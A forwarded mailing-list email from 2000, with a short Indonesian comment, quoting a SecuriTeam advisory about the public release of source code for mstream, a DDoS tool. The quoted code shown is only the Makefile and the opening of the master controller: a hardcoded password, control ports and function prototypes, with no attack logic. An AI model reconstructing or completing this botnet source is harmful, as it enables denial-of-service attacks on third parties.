>Delivered-To: [EMAIL PROTECTED]
>Date: Sat, 6 May 2000 09:49:03 -0400 (EDT)
>Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
>X-No-Archive: yes
>list-help: <mailto:[EMAIL PROTECTED]>
>list-unsubscribe: <mailto:[EMAIL PROTECTED]>
>list-post: <mailto:[EMAIL PROTECTED]>
>Delivered-To: mailing list [EMAIL PROTECTED]
>Delivered-To: moderator for [EMAIL PROTECTED]
>From: [EMAIL PROTECTED]
>To: [EMAIL PROTECTED]
>Subject: [EXPL] Source code to mstream, a DDoS tool, has been released
>
>The following security advisory is sent to the securiteam mailing list, 
>and can be found at the SecuriTeam web site: http://www.securiteam.com
>
>
>           Source code to mstream, a DDoS tool, has been released
>--------------------------------------------------------------------------- 
>-----
>
>
>SUMMARY
>
>We already described the mstream DDoS attack in our previous article:
>
><http://www.securiteam.com/securitynews/mstream_Distributed_Denial_of_Servi 
>ce_Tool.html> mstream Distributed Denial of Service Tool. Now the source 
>code for mstream has become publicly available.
>
>It's been alleged that this source code, was used for the distributed
>denial of service (DDoS) attacks earlier this year. Obviously such a thing
>cannot be confirmed aside from through a process of targeted sites making
>an appropriate comparison between the traffic this software would generate
>and the traffic they actually received.
>
>DETAILS
>
>Source Code:
>Makefile:
>
>------------------------
>
>CC = gcc
>
># -g is so i can debug it better :P
># -Wall so i can be happy
>
>CFLAGS = -g -Wall
>
>all: master server
>
>clean:
>rm -f master server
>
>master: master.c
>$(CC) $(CFLAGS) -o master master.c
>
>server: server.c
>$(CC) $(CFLAGS) -o server server.c
>
>
>------------------------
>
>master.c
>
>------------------------
>
>/* spwn */
>
>#define PASSWORD "sex"
>#define SERVERFILE ".sr"
>#define MASTER_TCP_PORT 6723
>#define MASTER_UDP_PORT 9325
>#define SERVER_PORT 7983
>#define MAXUSERS 3
>#define USED 1
>#define AUTH 2
>#define max(one, two) (one > two ? one : two)
>
>#define MAX_IP_LENGTH 17
>#define MAX_HOST_LENGTH 200
>
>#include <unistd.h>
>#include <sys/time.h>
>#include <stdio.h>
>#include <stdlib.h>
>#include <stdarg.h>
>#include <sys/socket.h>
>#include <sys/types.h>
>#include <netinet/in.h>
>#include <fcntl.h>
>#include <errno.h>
>#include <string.h>
>#include <netdb.h>
>#include <sys/uio.h>
>#include <signal.h>
>
>/* prototypes for my functions */
>void sighandle (int);
>int maxfd (int, int);
>void prompt (int);
>void tof (char *);
>void fof (char *);
>void send2server (u_long, char *, ...);
>void forkbg (void);
>void nlstr (char *);
>void sendtoall (char *, ...);
>char *inet_ntoa (struct in_addr);
>u_long inet_addr (const char *);
>int findfree (void);
>/* end of prototypes */

mungkin ada yang tertarik ?

> milis sedang diretest ulang.
---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Kirim email ke